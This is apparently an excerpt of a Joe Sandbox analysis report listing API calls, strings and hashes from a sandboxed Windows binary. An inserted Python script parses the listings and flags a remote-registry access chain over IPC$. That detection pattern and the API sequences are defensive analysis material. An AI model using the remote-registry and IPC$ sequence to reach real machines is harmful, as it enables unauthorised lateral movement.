• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 6d10e1f70eca278dcd8f8b7c7bbe0732dbbe99d61761053d914a98fcdf848d53
• Instruction ID: 77f368469ccb33937152ca547e567ecdbfbf209634d7d99929c63d765a873490
• Opcode Fuzzy Hash: 6d10e1f70eca278dcd8f8b7c7bbe0732dbbe99d61761053d914a98fcdf848d53
• Instruction Fuzzy Hash: 0F617B31501B12DFDF35DF98D948B2977B5FB94322F118529E0439A6B0C7B4A892DF81
APIs
  • Part of subcall function 00992234: GetWindowLongW.USER32(?,000000EB), ref: 00992242
• GetSysColor.USER32(0000000F), ref: 00992152
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: dfc8e08ab617450c91a084f4a7563b48cabca95beb323019e66d4805f3da54fa
• Instruction ID: d1cf9e6b74a9a1b2de2651b687463eb7824152e38728253c66441303a70aaf19
• Opcode Fuzzy Hash: dfc8e08ab617450c91a084f4a7563b48cabca95beb323019e66d4805f3da54fa
• Instruction Fuzzy Hash: 2F41B031144644BFDF349F6C9C48BB93B69AB42321F188615FAA28B2E6C7319D53DB11
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,009E0D31,00000001,0000138C,00000001,00000001,00000001,?,00A0EEAE,00A62430), ref: 009FA091
• LoadStringW.USER32(00000000,?,009E0D31,00000001), ref: 009FA09A
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
• GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,009E0D31,00000001,0000138C,00000001,00000001,00000001,?,00A0EEAE,00A62430,?), ref: 009FA0BC
• LoadStringW.USER32(00000000,?,009E0D31,00000001), ref: 009FA0BF
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 009FA1E0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                  • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                  • Opcode ID: b18c32197ff41178f6f25ab63900d364cd54351a9988911310a56959891d1e54
                                                                                                                                                                                                                                  • Instruction ID: f75767799d7d1d66b7c51c1a29deb5dd6033769509a3653dedde69e8ee60be17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b18c32197ff41178f6f25ab63900d364cd54351a9988911310a56959891d1e54
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0241407290410DAACF05EBE4DD46EEEB77CAF98341F100465F605B2092EB756F49CBA1
APIs
  • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009F1093
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009F10AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009F10CB
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009F10F5
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 009F111D
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009F1128
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009F112D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 323675364-22481851
• Opcode ID: dfae6bf49e9b7c69b7b6d4bf1f94ac2458c27c7dec285a750c28074d66f7360d
• Instruction ID: 20e043fa786131068be62100cf5d21c20ef14b45c67e1627e99fba62db6b7b73
• Opcode Fuzzy Hash: dfae6bf49e9b7c69b7b6d4bf1f94ac2458c27c7dec285a750c28074d66f7360d
• Instruction Fuzzy Hash: 8A41D972C1012DEBCF21EBA8EC85EEEB778BF54750F444169E905A3161EB359E09CB90
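The entry above is the kind of ordered API sequence an analyst lifts out of a report like this for triage tooling: WNetAddConnection2W (the string listing shows \IPC$), then RegConnectRegistryW with 80000002 (HKEY_LOCAL_MACHINE) as its second argument, then RegOpenKeyExW with a SOFTWARE\Classes\ path and access mask 00020019 (KEY_READ), ending in CLSIDFromString. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses API-listing lines in the format shown on this page (the sample is this entry's lines, embedded as a constructed input) and flags that specific ordered chain. The line regex, the ApiCall record and the chain-matching rule are the example's own assumptions about the listing format, not the report generator's.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the API listing of the remote-registry function entry,
# copied in the report's own format. Each line carries the API name, the module
# after the dot, a snapshot of the arguments, and the call-site address after "ref:".
SAMPLE = """\
• Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009F1093
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009F10AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\\Classes\\), ref: 009F10CB
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\\Classes\\), ref: 009F10F5
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\\Classes\\), ref: 009F111D
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\\Classes\\), ref: 009F1128
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\\Classes\\), ref: 009F112D
"""

# Assumed shape of one listing line (this regex is the example's own, not the
# report generator's): optional "Part of subcall function <addr>:" prefix,
# "<api>.<module>", optional "(<args>)", then "ref: <addr>".
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

HKEY_LOCAL_MACHINE = "80000002"  # predefined key handle as it appears in the argument snapshot


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                 # address of the call site
    subcall: Optional[int]   # address of the sub-function containing the call, if any


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn the bullet lines of one function entry into ApiCall records, in listing order."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings such as "APIs" or "Strings" are not call lines
        raw_args = m.group("args")
        args = tuple(raw_args.split(",")) if raw_args else ()
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16), sub))
    return calls


def remote_registry_chain(calls: List[ApiCall]) -> Optional[List[int]]:
    """Return the call-site addresses of an ordered WNetAddConnection2W ->
    RegConnectRegistryW(HKEY_LOCAL_MACHINE) -> RegOpenKeyExW(... SOFTWARE\\Classes\\ ...)
    sequence, or None when the listing does not contain it. Intervening calls are
    allowed; only the order and the argument constraints matter."""
    wanted = ("WNetAddConnection2W", "RegConnectRegistryW", "RegOpenKeyExW")
    hits: List[int] = []
    for c in calls:
        expected = wanted[len(hits)]
        if c.api != expected:
            continue
        if expected == "RegConnectRegistryW" and HKEY_LOCAL_MACHINE not in c.args:
            continue
        if expected == "RegOpenKeyExW" and not any("SOFTWARE\\Classes\\" in a for a in c.args):
            continue
        hits.append(c.ref)
        if len(hits) == len(wanted):
            return hits
    return None


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} {'(subcall)' if c.subcall else ''}")
    print("remote registry chain:", remote_registry_chain(parsed))
```

The matcher deliberately keys on the argument snapshot as well as the API names: RegConnectRegistryW against a hive other than HKEY_LOCAL_MACHINE, or RegOpenKeyExW on a path outside SOFTWARE\Classes\, does not count, so the same parser can be pointed at the other entries on this page without producing a hit for every registry read.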
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A24AD9
• CreateCompatibleDC.GDI32(00000000), ref: 00A24AE0
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A24AF3
• SelectObject.GDI32(00000000,00000000), ref: 00A24AFB
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00A24B06
• DeleteDC.GDI32(00000000), ref: 00A24B10
• GetWindowLongW.USER32(?,000000EC), ref: 00A24B1A
• SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00A24B30
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00A24B3C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 15be8292153b1c27c8293b4edd41c476c307b23fae09b1f40a6f6a121982b9e5
• Instruction ID: 15897493c0da89459a13341d59611eb2a58fd99ac0af765865fc306f72c68c6d
• Opcode Fuzzy Hash: 15be8292153b1c27c8293b4edd41c476c307b23fae09b1f40a6f6a121982b9e5
• Instruction Fuzzy Hash: 3C317031100225BBDF21DFA8DC08FEA3BA9FF0D364F110221FA15A61A1C775D862DB94
APIs
• VariantInit.OLEAUT32(?), ref: 00A146B9
• CoInitialize.OLE32(00000000), ref: 00A146E7
• CoUninitialize.OLE32 ref: 00A146F1
• _wcslen.LIBCMT ref: 00A1478A
• GetRunningObjectTable.OLE32(00000000,?), ref: 00A1480E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00A14932
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A1496B
• CoGetObject.OLE32(?,00000000,00A30B64,?), ref: 00A1498A
• SetErrorMode.KERNEL32(00000000), ref: 00A1499D
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A14A21
• VariantClear.OLEAUT32(?), ref: 00A14A35
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
• Opcode ID: 43d45262596c13b7cd218662e272f0f451a6f0b7624d2cd57bc3851c7d6417f5
• Instruction ID: ebcb92f7263901fae4411f50128be3396050974e4ca24d99f3ad5b739c632715
• Opcode Fuzzy Hash: 43d45262596c13b7cd218662e272f0f451a6f0b7624d2cd57bc3851c7d6417f5
• Instruction Fuzzy Hash: E0C146B1604305AFD700DF68C8849ABBBE9FF89748F10492DF9899B251DB31ED46CB52
APIs
• CoInitialize.OLE32(00000000), ref: 00A08538
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A085D4
• SHGetDesktopFolder.SHELL32(?), ref: 00A085E8
• CoCreateInstance.OLE32(00A30CD4,00000000,00000001,00A57E8C,?), ref: 00A08634
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A086B9
• CoTaskMemFree.OLE32(?,?), ref: 00A08711
• SHBrowseForFolderW.SHELL32(?), ref: 00A0879C
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A087BF
• CoTaskMemFree.OLE32(00000000), ref: 00A087C6
• CoTaskMemFree.OLE32(00000000), ref: 00A0881B
• CoUninitialize.OLE32 ref: 00A08821
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2762341140-0
                                                                                                                                                                                                                                  • Opcode ID: 66b99a74f948116fe55c98bf659d35efb02bfc764b4fdb21490c53fc08569728
                                                                                                                                                                                                                                  • Instruction ID: cc1707e1c4375d5c8c4d0a45cbe097163dd292bc487004d9c2312f80be252729
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66b99a74f948116fe55c98bf659d35efb02bfc764b4fdb21490c53fc08569728
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92C12D75A00109AFDB14DFA8D884DAEBBF5FF48304B1484A8F559EB261DB34ED46CB50
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009F039F
• SafeArrayAllocData.OLEAUT32(?), ref: 009F03F8
• VariantInit.OLEAUT32(?), ref: 009F040A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 009F042A
• VariantCopy.OLEAUT32(?,?), ref: 009F047D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 009F0491
• VariantClear.OLEAUT32(?), ref: 009F04A6
• SafeArrayDestroyData.OLEAUT32(?), ref: 009F04B3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009F04BC
• VariantClear.OLEAUT32(?), ref: 009F04CE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009F04D9
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 9d14002a6f440e1a1670a610c335e02f820f6ffe5901bd270243d0e37f27b646
• Instruction ID: 24f4510e806e3ce8321c8f423b79c12e1f2a24b9af7c8526503f321fb2c4b15c
• Opcode Fuzzy Hash: 9d14002a6f440e1a1670a610c335e02f820f6ffe5901bd270243d0e37f27b646
• Instruction Fuzzy Hash: 21414375A0021DDFCF10EFA8D8449BD7BB9FF88344F008465EA55A7262D774A946CF90
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
• Opcode ID: 7572ec23230069cfcd4d3e0710f2d74ed175328b6cbf7183e8d82a869fb8b489
• Instruction ID: 7c2040f3d33558adb5a8f0dc0847faf1322158abc1ddbf2e1c67aad378f8ebe5
• Opcode Fuzzy Hash: 7572ec23230069cfcd4d3e0710f2d74ed175328b6cbf7183e8d82a869fb8b489
• Instruction Fuzzy Hash: 9751C032A001169BCF14DFACC9619FFB7A5BF65360B204229E866E72D1DB35DE81C790
APIs
• CoInitialize.OLE32 ref: 00A141D1
• CoUninitialize.OLE32 ref: 00A141DC
• CoCreateInstance.OLE32(?,00000000,00000017,00A30B44,?), ref: 00A14236
• IIDFromString.OLE32(?,?), ref: 00A142A9
• VariantInit.OLEAUT32(?), ref: 00A14341
• VariantClear.OLEAUT32(?), ref: 00A14393
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: 2105c8c1ef64481c379d103be8478adef740fcdb7287d8f49f9c9b2da73a3d67
• Instruction ID: a031b232dbff316b73faa255cc12ba66a0950ddccaf42ffcc7b27dc577dceb1d
• Opcode Fuzzy Hash: 2105c8c1ef64481c379d103be8478adef740fcdb7287d8f49f9c9b2da73a3d67
• Instruction Fuzzy Hash: 3E619271608701AFD310DFA8C889BEEBBE4EF89714F100919F9959B291D770ED85CB92
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00A08C9C
                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A08CAC
                                                                                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A08CB8
                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A08D55
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08D69
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08D9B
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A08DD1
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08DDA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                  • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                  • Opcode ID: 5612a85b02b5ec6c4bbbd72dc4320a2b4f31beb6bababf50d37ec4430f21a1b8
                                                                                                                                                                                                                                  • Instruction ID: 6e1314bd782a638343bccccd8bbdfdbebf3c079804ad67970d7aacc283f352c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5612a85b02b5ec6c4bbbd72dc4320a2b4f31beb6bababf50d37ec4430f21a1b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B616CB25043099FDB10EF64D844AAEB3E8FF99310F04492EF989C7291DB35E945CB96
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateMenu.USER32 ref: 00A24715
                                                                                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00A24724
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A247AC
                                                                                                                                                                                                                                  • IsMenu.USER32(?), ref: 00A247C0
                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00A247CA
                                                                                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A247F7
                                                                                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00A247FF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                  • String ID: 0$F
                                                                                                                                                                                                                                  • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                  • Opcode ID: 5de44a9511e63cc48eb92588ded85ff3ed2f1c10f9d06bf5dd95f54a05611c00
                                                                                                                                                                                                                                  • Instruction ID: 728e77b386f62fd8120701b49f65cc0bbcba2921833595738b3aa58c54cffc2e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de44a9511e63cc48eb92588ded85ff3ed2f1c10f9d06bf5dd95f54a05611c00
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8417A75A11219EFDB24CFA8E884FAA7BB5FF49314F144028FA46A7351D7B0A912CF50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 009F28B1
                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 009F28BC
                                                                                                                                                                                                                                  • GetParent.USER32 ref: 009F28D8
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009F28DB
                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 009F28E4
                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 009F28F8
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009F28FB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                  • API String ID: 711023334-1403004172
